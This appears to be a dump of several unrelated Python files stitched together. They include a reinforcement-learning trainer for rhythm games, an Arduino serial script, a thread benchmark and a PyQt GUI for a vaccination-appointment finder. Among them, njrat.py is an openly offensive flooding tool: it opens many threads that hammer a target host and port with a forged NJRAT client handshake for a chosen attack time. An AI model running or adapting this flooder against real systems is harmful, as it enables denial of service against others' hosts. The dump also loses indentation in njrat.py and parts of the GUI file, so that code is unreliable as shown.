    trainer = RainbowTrainer(env, batch_size=batch_size, lr=lr, gamma=gamma, omega=omega, beta=beta, sigma=sigma, n=n,
                             eps=eps, atoms=atoms, norm_clip=norm_clip, load_weights=load_weights, load_memory=load_memory,
                             Vmin=Vmin, Vmax=Vmax, load_optimizer=load_optimizer, data_efficient=data_efficient)
    if load_stats is None:
        stat = {'episode_reward': []}
    else:
        with open(load_stats, 'rb') as f:
            stat = pickle.load(f)
    reward = 0.0
    need_save = False
    done = True
    count = 0
    thread = None
    for t in tqdm(range(resume_start, max_timestep), desc="Timestep", unit='step', unit_scale=True):
        if done:
            # Episode boundary: flush stats/plots for the finished episode,
            # checkpoint if requested, then reset the environment.
            if t > resume_start:
                count += 1
                trainer.avg_reward_plotter.step(episode_reward)
                trainer.avg_reward_plotter.show()
                trainer.plotter.show()
                stat['episode_reward'].append(episode_reward.item())
                if count % 100 == 0:
                    print(' - Mean reward over last 100 episodes: %.4f' % np.array(stat['episode_reward'][max(-100, -len(stat['episode_reward'])):]).mean())
                if need_save:
                    trainer.save(model_save_path + str(t) + ".pt", memory_save_path, optimizer_path)
                    with open(save_stats, 'wb') as f:
                        pickle.dump(stat, f, protocol=4)
                    need_save = False
            episode_reward = 0.0
            gc.collect()
            state = env.reset(reward)
            env.launch_episode(reward)
        trainer.reset_noise()
        action = trainer.select_action(state)
        next_state, reward, done = env.step(action)
        reward = max(min(reward, 1.0), -1.0)  # Reward clipping
        episode_reward += reward
        if env.episode_counter > 0:  # Skip first episode because of latency issues
            trainer.memory.append(state[-1], action, reward, done)
        # Bug fix: advance the observation (next_state was previously unused).
        state = next_state
        if t >= learn_start and t % learning_freq == 0 and not evaluation:
            trainer.memory.priority_weight = min(trainer.memory.priority_weight + priority_weight_increase, 1)
            # Run the optimize step concurrently with the next env interaction.
            if thread is not None:
                thread.join()
            thread = Thread(target=trainer.optimize)
            thread.start()
            if t % target_update_freq == 0 and t > 0:
                trainer.update_target_net()
        if t % save_freq == 0 and t > 0:
            # Defer the actual save to the next episode boundary to avoid
            # stalling the agent mid-play.
            need_save = True
def TaikoTrain(lr=0.00008, batch_size=32, stack_size=1, skip_pixels=4, save_freq=20000, episode_nb=5,
               target_update_freq=10000, star=None, beatmap_name=None, min_experience=10000, root_dir='./weights',
               evaluation=False):
    """Train (or evaluate) the Taiko agent for ``episode_nb`` episodes.

    Unlike the other trainers, all optimize steps for an episode are replayed
    after the episode finishes (one per step taken), so the agent plays at
    full speed without concurrent learning.
    """
    env = environment.TaikoEnv(stack_size=stack_size, star=star, beatmap_name=beatmap_name, skip_pixels=skip_pixels)
    tt = TaikoTrainer(env, batch_size=batch_size, lr=lr, gamma=GAMMA, root_dir=root_dir, min_experience=min_experience, norm_clip=10.0)
    need_update = False
    need_save = False
    for episode in range(episode_nb):
        state = env.reset()
        env.launch_episode()
        episode_reward = 0.0
        for steps in range(MAX_STEPS):
            # Greedy action in evaluation, exploratory action otherwise.
            if evaluation:
                action = tt.select_action(state)
            else:
                action = tt.select_explo_action(state)
            new_state, reward, done = env.step(action)
            episode_reward += reward
            if not done:
                # Store the transition asynchronously to keep the loop fast.
                th = Thread(target=tt.memory.push,
                            args=(state, action, reward, new_state))
                th.start()
            else:
                break
            state = new_state
            # These boolean allow the program to wait for the end of the episode before performing the updates or the save to avoid latency while the agent is playing
            if tt.steps_done % target_update_freq == 0:
                need_update = True
            if tt.steps_done % save_freq == 0:
                need_save = True
        # Replay one optimize step per environment step taken this episode.
        for _ in range(steps):
            tt.optimize()
        if need_update:
            tt.update_target()
            need_update = False
        if need_save:
            tt.save()
            need_save = False
        print(steps)
        tt.avg_reward_plotter.step(episode_reward)
        tt.avg_reward_plotter.show()
    tt.stop()
# Script entry point. The triple-quoted strings below are previous training
# configurations kept as disabled code for reference.
if __name__ == '__main__':
    '''
    weights_path = './weights/q_net__21-12-2020-14.pt'
    memory_path = './memory.pck'
    save_name = '_25-12-2020-'
    trainQNetwork(50, LEARNING_RATE, evaluation=False, load_weights=None, beatmap_name="sink", star=7,
                  save_name=save_name, batch_size=BATCH_SIZE, human_off_policy=False, no_fail=True,
                  initial_p=1.0, end_p=0.05, decay_p=4000000, target_update=30000, init_k=0, min_experience=50)
    '''
    '''
    RainbowManiaTrain(star=3, beatmap_name="bongo", num_actions=2**4, model_save_path="weights/Taiko_Bongo-31-05-2021_3stars",
                      learn_start=1600, load_weights=None, load_memory=None, batch_size=32, max_timestep=int(1e6),
                      memory_save_path='./weights/memory28-03-2021.zip', Vmin=-1, Vmax=10, resume_start=0, target_update_freq=5000,
                      load_stats=None, save_freq=5000, save_stats='./stats/stats-28-03-2021.pkl', learning_freq=1, lr=0.0001,
                      load_optimizer=None, optimizer_path='./weights/opti.pt', evaluation=False, n=20, data_efficient=True)
    '''
    # Currently active run: Taiko evaluation.
    TaikoTrain(root_dir='./weights/Taiko/2021-09-05_15/29/', evaluation=True, episode_nb=1500, min_experience=1500, save_freq=5000, target_update_freq=2000, batch_size=16, lr=0.0002)
|
njrat.py
|
#!/usr/bin/env python3
#MIT License
#
#Copyright (c) 2021 Sloobot
#
#Permission is hereby granted, free of charge, to any person obtaining a copy
#of this software and associated documentation files (the "Software"), to deal
#in the Software without restriction, including without limitation the rights
#to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
#copies of the Software, and to permit persons to whom the Software is
#furnished to do so, subject to the following conditions:
#
#The above copyright notice and this permission notice shall be included in all
#copies or substantial portions of the Software.
#
#THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
#IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
#FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
#AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
#LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
#OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
#SOFTWARE.
import time
import socket
from threading import Thread
# Payload for NJRAT
payload = b"149\x00ll|'|'|SGFjS2VkXzc2MTNBMTJG|'|'|SERVERPC|'|'|ser|'|'|14-05-27|'|'||'|'|Win 8.1 ProSP0 x86|'|'|No|'|'|0.7d|'|'|..|'|'|UHJvZ3JhbSBNYW5hZ2VyAA==|'|'|"
print(payload)
def NJRAT_ATTACK(threads, attack_time, target):
# Finish
global FINISH
FINISH = False
target_ip = target.split(":")[0]
target_port = int(target.split(":")[1])
print("\033[1;34m"+"[*]"+"\033[0m"+" Starting NJRAT attack...")
threads_list = []
def njrat_flood():
global FINISH
while True:
if FINISH:
break
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((target_ip, target_port))
except Exception as e:
print(e)
print("\033[1;31m"+"[-]"+"\033[0m"+" Failed to connect to NJRAT client!")
exit()
try:
sock.sendall(payload)
except Exception as e:
print(e)
time.sleep(0.25)
continue
else:
print("\033[1;32m"+"[+]"+"\033[0m"+" NJRAT client is connected!")
# Start threads
for thread in range(threads):
print("\033[1;34m"+"[*]"+"\033[0m"+" Staring thread " + str(thread) + "...")
t = Thread(target = njrat_flood)
t.start()
threads_list.append(t)
# Sleep selected secounds
time.sleep(attack_time)
# Terminate threads
for thread in threads_list:
FINISH = True
thread.join()
print("\033[1;33m"+"[!]"+"\033[0m"+" Attack completed.")
|
enviandoArduino.py
|
import serial
import threading
import time
# Shared state between the main loop and the serial-reader thread.
conectado = False
desligarArduino = False
contador = 0
# These parameters could be turned into user inputs.
portaCOM = 'COM5'
velocidadeBaud = 115200
# If the port/baud are valid, open the serial connection here.
try:
    # Serial communication with the Arduino (0.2 s read timeout).
    serialArduino = serial.Serial(portaCOM, velocidadeBaud, timeout=0.2)
    print('Conectado!')
# Otherwise report the failure (script continues; later calls will fail).
except:
    print('Verifique a porta serial do seu Arduino ou reconecte seu Arduino!')
# É necessario criar uma função pro Thread
def leitura_porta(serialArduino, conectado=None, desligarArduino=None):
    """Continuously read lines from the Arduino serial port and hand each
    non-empty line to enviar(), until told to shut down.

    Args:
        serialArduino: open serial.Serial instance to read from.
        conectado: unused legacy parameter, kept for call compatibility.
        desligarArduino: optional explicit shutdown flag; when None (the
            default, as when the thread is started with only the port
            argument) the module-level ``desligarArduino`` flag set by the
            main loop on Ctrl+C is consulted instead.

    Fixes:
        * pyserial's method is ``readline()`` -- the original ``readLine()``
          raised AttributeError on the first read.
        * the shutdown check only looked at the parameter (never updated
          from the main loop), so the thread could never be stopped.
    """
    while True:
        reading = serialArduino.readline().decode()
        if reading != "":  # empty string means the 0.2 s read timed out
            enviar(reading)
        # Prefer an explicitly passed flag; otherwise fall back to the module-level one.
        stop = desligarArduino if desligarArduino is not None else globals().get("desligarArduino", False)
        if stop:
            print('Desligando Arduino')
            break
def enviar(reading):
    """Consume one line received from the serial-reader thread: log it and
    bump the module-level message counter."""
    global contador
    contador += 1
    print(f'Recebi {reading}')
# Start the reader thread; only the port is passed, so leitura_porta uses
# its default flag parameters.
lerSerialThread = threading.Thread(target=leitura_porta, args=(serialArduino,))
lerSerialThread.start()
print('Preparando o Arduino')
time.sleep(2)
print('Arduino pronto!')
# Main program: toggle the lamp every 2 seconds until Ctrl+C.
while (True):
    try:
        print('Enviando')
        serialArduino.write('ligar lampada\n'.encode())
        time.sleep(2)
        print('Enviando')
        serialArduino.write('desligar lampada\n'.encode())
        time.sleep(2)
    except KeyboardInterrupt:
        # Keyboard interrupt: signal the reader thread, close the port, exit.
        # NOTE(review): the port is closed before the reader thread joins, so
        # the thread's next readline may raise -- confirm shutdown ordering.
        print('Apertou ctrl + C')
        desligarArduino = True
        serialArduino.close()
        lerSerialThread.join()
        conectado = False
        break
|
06-performace-threads-python.py
|
import datetime
import math
from multiprocessing import cpu_count
from threading import Thread
def computar(fim, inicio=1):
    """CPU-burning busy loop used to benchmark thread throughput.

    Steps a counter from ``inicio`` (exclusive) up to ``fim``, computing and
    discarding one square root per step. Returns None.
    """
    fator = 1000 * 1000
    pos = inicio
    while pos < fim:
        pos = pos + 1
        diff = pos - fator
        math.sqrt(diff * diff)
def main():
    """Fan the 50M-iteration workload of ``computar`` out over one daemon
    thread per CPU core and report the wall-clock time taken."""
    quantidade_cores = cpu_count()
    print(f'Realizando o processamento com {quantidade_cores} core(s)')
    inicio = datetime.datetime.now()
    ths = []
    for n in range(1, quantidade_cores + 1):
        # Each core gets a contiguous slice of the 1..50_000_000 range.
        ini = 50_000_000 * (n - 1) / quantidade_cores + 1
        fim = 50_000_000 * (n) / quantidade_cores
        print(f'core {n} processando de {ini} até {fim}')
        worker = Thread(target=computar, kwargs={"fim": fim, "inicio": ini}, daemon=True)
        ths.append(worker)
    for worker in ths:
        worker.start()
    for worker in ths:
        worker.join()
    tempo = datetime.datetime.now() - inicio
    print(f"terminou em {tempo.total_seconds():.2f} segundos")
# Script entry point; the trailing string records a sample measured runtime.
if __name__ == '__main__':
    main()
"""
Terminou em 16.07 segundos
"""
|
gui.py
|
#!/usr/bin/env python3
import json
import multiprocessing
import os
import threading
import time
import sys
from PyQt5 import QtCore, QtWidgets, uic
from PyQt5.QtGui import QIcon
from tools.exceptions import ValidationError, MissingValuesError
from tools import Modus
from tools import kontaktdaten as kontak_tools
from tools.gui import oeffne_file_dialog_select, open_browser
from tools.gui.qtkontakt import QtKontakt
from tools.gui.qtterminsuche import QtTerminsuche
from tools.gui.qtcodegen import QtCodeGen
from tools.utils import create_missing_dirs, update_available, get_latest_version, get_current_version
PATH = os.path.dirname(os.path.realpath(__file__))
class HauptGUI(QtWidgets.QMainWindow):
# Folgende Widgets stehen zur Verfügung:
### QLineEdit ###
# i_kontaktdaten_pfad
### Buttons ###
# b_termin_suchen
# b_code_generieren
# b_dateien_kontaktdaten
# b_neue_kontaktdaten
### Layouts ###
# prozesse_layout
### QSpinBox ###
# i_interval
    def __init__(self, pfad_fenster_layout: str = os.path.join(PATH, "tools/gui/main.ui")):
        """
        Main window of the GUI application.

        Args:
            pfad_fenster_layout (str, optional): Loads the given layout file
                (created with QT Designer https://www.qt.io/download).
                Defaults to os.path.join(PATH, "tools/gui/main.ui").
        """
        super().__init__()
        create_missing_dirs(PATH)
        # Spawn for now (The parent process starts a fresh python interpreter process. The child process will only inherit those resources necessary to run the process object’s)
        multiprocessing.set_start_method('spawn')
        # Load the .ui file and apply adjustments
        self.setup(pfad_fenster_layout)
        # Show the GUI
        self.show()
        # Workaround so the window is hopefully brought to the foreground
        self.activateWindow()
        # Check whether a newer version is available
        self.check_update()
##############################
# Allgemein Fenster #
##############################
    @staticmethod
    def start_gui():
        """
        Starts the GUI application and blocks until the Qt event loop exits.
        """
        app = QtWidgets.QApplication(list())
        # NOTE(review): AA_X11InitThreads is set before any window is created;
        # presumably needed for the watchdog thread on X11 -- confirm.
        app.setAttribute(QtCore.Qt.AA_X11InitThreads)
        window = HauptGUI()
        app.exec_()
    def setup(self, pfad_fenster_layout: str):
        """
        Creates the standard configuration for the GUI before it can be shown.

        Args:
            pfad_fenster_layout (str): path to the .ui layout file
        """
        ### General ###
        create_missing_dirs(PATH)
        # Default path to the contact-data file
        self.pfad_kontaktdaten: str = os.path.join(PATH, "data", "kontaktdaten.json")
        ### GUI ###
        uic.loadUi(pfad_fenster_layout, self)
        self.setWindowIcon(QIcon(os.path.join(PATH, "images/spritze.ico")))
        try:
            self.setWindowTitle('vaccipy ' + get_current_version())
        except Exception as error:
            # Version lookup is best effort; fall back to a plain title.
            self.setWindowTitle('vaccipy')
            pass
        # Warn if the stored contact data stems from an older version
        self.__check_old_kontakt_version()
        # Wire the buttons to their handlers
        self.b_termin_suchen.clicked.connect(self.__termin_suchen)
        self.b_code_generieren.clicked.connect(self.__code_generieren)
        self.b_dateien_kontaktdaten.clicked.connect(self.__update_kontaktdaten_pfad)
        self.b_neue_kontaktdaten.clicked.connect(lambda: self.kontaktdaten_erstellen(Modus.TERMIN_SUCHEN))
        # Show the default path in the GUI
        self.i_kontaktdaten_pfad.setText(self.pfad_kontaktdaten)
        # Holds all running termin_suchen processes
        self.such_prozesse = list(list())
        self.prozesse_counter = 0
        # Background thread watching the processes
        # (presumably reaps finished ones -- see __check_status_der_prozesse)
        self.prozess_bewacher = threading.Thread(target=self.__check_status_der_prozesse, daemon=True)
        self.prozess_bewacher.start()
def check_update(self):
"""
Prüft auf neuere Version und gibt evtl. ne Benachrichtigung an den User
"""
try:
# Auf Update prüfen
if update_available():
url = f"https://github.com/iamnotturner/vaccipy/releases/tag/{get_latest_version()}"
if get_current_version() != 'source':
title = "Alte Version!"
text = "Bitte Update installieren"
info_text = f"Die Terminsuche funktioniert möglicherweise nicht, da du eine alte Version verwendest ({get_current_version()})"
else:
title = "Sourcecode"
text = "Updateprüfung nicht möglich!"
info_text = "Du benutzt die nicht paketierten Skripte von Github. Die Terminsuche funktioniert möglicherweise nicht, da die Version veraltet sein könnten."
msg = QtWidgets.QMessageBox()
msg.setIcon(QtWidgets.QMessageBox.information)
msg.setWindowTitle(title)
msg.setText(text)
msg.setInformativeText(info_text)
msg.addButton(msg.Close)
btn_download = msg.addButton("Download", msg.ApplyRole)
btn_download.clicked.connect(lambda: open_browser(url))
msg.exec_()
except Exception as error:
# warum auch immer konnte nicht überprüft werden
# einfach nichts machen
pass
    def __code_generieren(self):
        """
        Starts the code-generation process in a separate process, after
        loading and validating the contact data. Shows an error dialog and
        returns early on missing/invalid data; allows at most one
        code-generation process at a time.
        """
        try:
            kontaktdaten = self.__get_kontaktdaten(Modus.CODE_GENERIEREN)
            #return if no data was returned
            if not kontaktdaten:
                return
        except FileNotFoundError as error:
            QtWidgets.QMessageBox.critical(self, "Datei nicht gefunden!", f"Datei zum Laden konnte nicht gefunden werden\n\nBitte erstellen")
            return
        except ValidationError as error:
            QtWidgets.QMessageBox.critical(self, "Daten Fehlerhaft!", f"In der angegebenen Datei sind Fehler:\n\n{error}")
            return
        except MissingValuesError as error:
            QtWidgets.QMessageBox.critical(self, "Daten Fehlerhaft!", f"In der angegebenen Datei Fehlen Daten:\n\n{error}")
            return
        strProcName = "Codegen"
        # allow only 1 Code Gen at a time
        for subProvess in self.such_prozesse:
            if subProvess.name == strProcName:
                QtWidgets.QMessageBox.information(self, "STOP", "Es läuft bereits eine Codegenerierung!")
                return False
        #start codegen process (daemon: dies with the GUI)
        code_prozess = multiprocessing.Process(target=QtCodeGen.start_code_gen,
                                               name=strProcName, daemon=True, kwargs={
                                                   "kontaktdaten": kontaktdaten,
                                                   "ROOT_PATH": PATH
                                               })
        #add code search to list of prozesses
        try:
            code_prozess.start()
            if not code_prozess.is_alive():
                raise RuntimeError(
                    f"Code suche wurde gestartet, lebt aber nicht mehr!"
                )
        except Exception as error:
            QtWidgets.QMessageBox.critical(self, "Fehler - Codegenerierung nicht gestartet!", str(error))
        else:
            # Process started successfully: track it and show it in the GUI.
            self.such_prozesse.append(code_prozess)
            self.__add_prozess_in_gui(code_prozess)
            self.prozesse_counter += 1
def __termin_suchen(self):
    """
    Load contact data and start the appointment search via
    Impfterminservice in a new daemon process (added to self.such_prozesse,
    so it is killed as soon as the bot exits).
    """
    try:
        kontaktdaten = self.__get_kontaktdaten(Modus.TERMIN_SUCHEN)
    except FileNotFoundError:
        QtWidgets.QMessageBox.critical(self, "Datei nicht gefunden!", f"Datei zum Laden konnte nicht gefunden werden\n\nBitte erstellen")
        return
    except ValidationError as error:
        QtWidgets.QMessageBox.critical(self, "Daten Fehlerhaft!", f"In der angegebenen Datei sind Fehler:\n\n{error}")
        return
    except MissingValuesError as error:
        QtWidgets.QMessageBox.critical(self, "Daten Fehlerhaft!", f"In der angegebenen Datei Fehlen Daten:\n\n{error}")
        return
    # Nothing was returned (e.g. dialog cancelled) -> nothing to do
    if not kontaktdaten:
        return
    self.__start_terminsuche(kontaktdaten, kontaktdaten["zeitrahmen"])
def __start_terminsuche(self, kontaktdaten: dict, zeitrahmen: dict):
    """
    Start the appointment search in a separate daemon process so the GUI
    does not block.

    Args:
        kontaktdaten (dict): contact data from kontaktdaten.json
        zeitrahmen (dict): time-frame settings from the contact data
    """
    check_delay = self.i_interval.value()
    codes = kontaktdaten["codes"]
    # Process name combines the first code and a counter so several
    # searches can be told apart in the GUI.
    terminsuche_prozess = multiprocessing.Process(target=QtTerminsuche.start_suche, name=f"{codes[0]}-{self.prozesse_counter}", daemon=True, kwargs={
        "kontaktdaten": kontaktdaten,
        "zeitrahmen": zeitrahmen,
        "ROOT_PATH": PATH,
        "check_delay": check_delay})
    try:
        terminsuche_prozess.start()
        if not terminsuche_prozess.is_alive():
            # BUGFIX: multiprocessing.Process has no getName() method (that
            # is a deprecated threading.Thread API) - the original call
            # raised AttributeError here; use the .name attribute instead.
            raise RuntimeError(
                f"Terminsuche wurde gestartet, lebt aber nicht mehr!\n\nTermin mit Code: {terminsuche_prozess.name}\nBitte Daten Prüfen!"
            )
    except Exception as error:
        QtWidgets.QMessageBox.critical(self, "Fehler - Suche nicht gestartet!", str(error))
    else:
        # Register the process in the bookkeeping list and in the GUI
        self.such_prozesse.append(terminsuche_prozess)
        self.__add_prozess_in_gui(terminsuche_prozess)
        self.prozesse_counter += 1
def __update_kontaktdaten_pfad(self, pfad: str):
    """
    Update the contact-data path shown in the GUI and stored on the class.

    If a path is passed in, it is taken as-is; otherwise a QFileDialog is
    opened so the user can pick an existing file.

    Args:
        pfad (str): if truthy, use this path instead of asking the user
    """
    if not pfad:
        try:
            pfad = oeffne_file_dialog_select(self, "Kontakdaten", self.pfad_kontaktdaten)
        except FileNotFoundError:
            # User cancelled / picked nothing - keep the current path
            return
    self.pfad_kontaktdaten = pfad
    self.i_kontaktdaten_pfad.setText(self.pfad_kontaktdaten)
def __add_prozess_in_gui(self, prozess: multiprocessing.Process):
    """Show the given process as a row (label + stop button) in prozesse_layout."""
    stop_button = QtWidgets.QPushButton("Stoppen")
    # Object name doubles as lookup key in __remove_prozess_von_gui
    stop_button.setObjectName(prozess.name)
    stop_button.clicked.connect(lambda: self.__stop_prozess(prozess))
    self.prozesse_layout.addRow(QtWidgets.QLabel(f"Prozess: {prozess.name}"), stop_button)
def __stop_prozess(self, prozess: multiprocessing.Process):
    """
    Stop the given process and remove it from the GUI.

    Args:
        prozess (multiprocessing.Process): process to be killed
    """
    # Hard kill (SIGKILL on Unix); kill() does not wait for the process.
    prozess.kill()
    self.such_prozesse.remove(prozess)
    self.__remove_prozess_von_gui(prozess)
def __remove_prozess_von_gui(self, prozess: multiprocessing.Process):
    """
    Remove the row displaying the given process from the GUI.

    Args:
        prozess (multiprocessing.Process): process whose row should be removed
    """
    # The stop button carries the process name as its object name
    # (set in __add_prozess_in_gui), so it can be looked up here;
    # removeRow(widget) deletes the whole form row containing it.
    button = self.findChild(QtWidgets.QPushButton, prozess.name)
    self.prozesse_layout.removeRow(button)
def __check_status_der_prozesse(self):
    """
    Background loop: permanently poll the search processes and remove
    dead ones from the bookkeeping list and the GUI.
    """
    while True:
        # BUGFIX: iterate over a snapshot - removing from the list while
        # iterating it skips the element right after each removed process.
        for prozess in list(self.such_prozesse):
            if not prozess.is_alive():
                self.__remove_prozess_von_gui(prozess)
                self.such_prozesse.remove(prozess)
        time.sleep(1.5)
def __check_old_kontakt_version(self, kontaktdaten: dict = None) -> bool:
    """
    Detect contact data written by an old program version.

    With data: the new format must contain a "zeitrahmen" key.
    Without data: a leftover zeitspanne.json from the old version is
    deleted and treated as "old version detected".

    Args:
        kontaktdaten (dict, optional): loaded contact data. Defaults to None.

    Returns:
        bool: False for the old layout (a warning is shown), True otherwise
    """
    if kontaktdaten:
        if "zeitrahmen" in kontaktdaten:
            return True
        # Missing "zeitrahmen" -> old layout, fall through to the warning
    else:
        veraltete_datei = os.path.join(PATH, "data", "zeitspanne.json")
        if not os.path.isfile(veraltete_datei):
            return True
        # Old standalone file exists -> delete it and warn below
        os.remove(veraltete_datei)
    QtWidgets.QMessageBox.critical(self, "Alte Version von Kontaktdaten!",
                                   "Die Kontakdaten scheinen von einer älteren Version zu sein.\nKontakdaten und Zeitspanne sind nun in einer Datei.\n\nBitte Datei neu erstellen!")
    return False
##############################
# Kontaktdaten #
##############################
def kontaktdaten_erstellen(self, modus: Modus = Modus.TERMIN_SUCHEN):
    """
    Open the dialog for entering contact data.

    Args:
        modus (Modus): depending on the mode not all fields are required.
            Defaults to TERMIN_SUCHEN.
    """
    kontakt_dialog = QtKontakt(self, modus, self.pfad_kontaktdaten, PATH)
    # Keep the GUI's path in sync when the dialog saves to a new file
    kontakt_dialog.update_path.connect(self.__update_kontaktdaten_pfad)
    kontakt_dialog.show()
    kontakt_dialog.exec_()
def __get_kontaktdaten(self, modus: Modus) -> dict:
    """
    Load the contact data from the path configured in the GUI.

    If the file does not exist yet, the creation dialog is opened first.

    Args:
        modus (Modus): depending on the mode not all fields are required.

    Returns:
        dict: contact data

    Raises:
        ValidationError: old data layout or placeholder vaccination code
    """
    if not os.path.isfile(self.pfad_kontaktdaten):
        self.kontaktdaten_erstellen(modus)
    kontaktdaten = kontak_tools.get_kontaktdaten(self.pfad_kontaktdaten)
    kontak_tools.check_kontaktdaten(kontaktdaten, modus)
    if modus == Modus.TERMIN_SUCHEN and not self.__check_old_kontakt_version(kontaktdaten):
        raise ValidationError('"zeitrahmen" fehlt -> Alte Version')
    # Reject the placeholder code from the template file
    if "XXXX-XXXX-XXXX" in kontaktdaten.get("codes", []):
        raise ValidationError("Der Code is ungültig. Bitte trage einen korrekten Code ein!")
    return kontaktdaten
def main():
    """
    Start the GUI application.

    freeze_support() must be called first: it is required so that a
    frozen (e.g. PyInstaller) Windows executable can safely spawn the
    multiprocessing child processes used for searches; it is a no-op
    when the program is run normally.
    """
    multiprocessing.freeze_support()
    HauptGUI.start_gui()
if __name__ == "__main__":
    main()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.